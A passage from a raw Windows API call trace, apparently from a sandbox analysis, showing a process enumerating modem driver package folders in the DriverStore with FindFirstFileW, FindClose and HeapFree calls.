ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6bf5f562, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.135] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.135] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.136] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmags64.inf_amd64_neutral_e68956e24e287714\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50394c90, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6bfab822, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6bfab822, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.136] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.136] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.136] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmairte.inf_amd64_neutral_0feacd08cb9c7fe3\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x494265e3, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x671442f2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x671442f2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.136] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.136] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.140] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmaiwa.inf_amd64_neutral_560c956da9bcd8f5\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x494beb64, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6716a452, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6716a452, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.140] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.141] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.141] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmaiwa3.inf_amd64_neutral_77e515342bd572cc\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x495c9506, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6716a452, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6716a452, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.141] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.141] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.141] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmaiwa4.inf_amd64_neutral_6e97842bb8d9e6a8\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496add48, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x671905b2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x671905b2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.141] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.142] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.142] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmaiwa5.inf_amd64_neutral_ea8128ac5da37eb9\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4976c429, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x671dc873, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x671dc873, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.142] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.142] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.142] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmaiwat.inf_amd64_neutral_213e93b5ced8b0fe\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x498049aa, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x672029d3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x672029d3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.142] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.143] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.143] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmar1.inf_amd64_neutral_b8ebf59556c3dbf0\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4989cf2b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67228b33, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67228b33, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.143] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.144] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.144] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmarch.inf_amd64_neutral_4261401e3170ebfb\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4995b60d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67274df4, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67274df4, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.144] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.144] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.144] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmarn.inf_amd64_neutral_fa693d8797766f49\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49a19cee, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6729af54, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6729af54, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.145] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.145] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.145] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmati.inf_amd64_neutral_ded8f26cdee953c3\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ad83cf, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x672e7215, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x672e7215, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.145] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.145] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.145] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmatm2k.inf_amd64_neutral_64a8fb018ead55a7\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49bbcc11, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x675226b9, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x675226b9, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.145] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.146] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.146] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmaus.inf_amd64_neutral_5fa4270b9924b918\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49c55192, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6756e979, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6756e979, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.146] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.146] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.146] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmboca.inf_amd64_neutral_cc532ed7b3b5b5a9\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49d399d4, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x677a9e1e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x677a9e1e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.146] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.147] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.147] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbr002.inf_amd64_neutral_ce2134188ab21f59\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48c1db94, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66db21eb, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66db21eb, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.147] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.147] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.147] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbr004.inf_amd64_neutral_ccf1bc353e588fe1\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48cdc276, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66dd834b, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66dd834b, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.147] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.148] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.148] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbr005.inf_amd64_neutral_d140721f97061bba\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48d9a957, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66dfe4ac, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66dfe4ac, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.148] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.148] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.148] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbr006.inf_amd64_neutral_40c76453575b1208\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48e59038, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66dfe4ac, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66dfe4ac, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.149] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.149] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.149] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbr007.inf_amd64_neutral_91d259640bad7d26\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48f3d87a, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66e2460c, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66e2460c, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.149] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.149] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.149] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbr008.inf_amd64_neutral_2cedaac353c381da\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48ffbf5b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66e4a76c, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66e4a76c, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.150] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.150] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.150] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbr00a.inf_amd64_neutral_aa4f0850ff03674e\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x490ba63d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66e708cd, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66e708cd, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.150] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.150] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.150] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbsb.inf_amd64_neutral_56a9f6bceeec7f72\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49e1e215, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x679e52c2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x679e52c2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.151] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.151] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.151] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbtmdm.inf_amd64_neutral_2e4da8629fc5904e\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39c712bb, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5f6f97d0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5f6f97d0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.151] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.152] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.152] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbug3.inf_amd64_neutral_7617862a9cc286da\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49eb6796, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67a0b422, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67a0b422, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.153] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.153] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.156] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmbw561.inf_amd64_neutral_fe42c0ff14d5562b\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49f74e78, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67a0b422, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67a0b422, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.157] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.157] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.157] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmc26a.inf_amd64_neutral_547edd894d7c19d9\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a00d3f9, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67a31582, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67a31582, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.157] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.157] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.158] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcdp.inf_amd64_neutral_170c11f3a6d3f0a8\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a0cbada, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67a31582, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67a31582, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.158] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.158] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.158] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcm28.inf_amd64_neutral_d3fa0f62d3d7cea1\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a1d647c, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67a7d843, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67a7d843, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.158] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.158] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.159] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcodex.inf_amd64_neutral_9bb71004e7b8f7ae\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a2bacbe, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67ac9b03, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67ac9b03, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.159] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.159] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.159] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmcom1.inf_amd64_neutral_96c22c683482d8bd\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a39f500, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67aefc64, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67aefc64, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.159] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.160] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.160] FindFirstFileW (in: 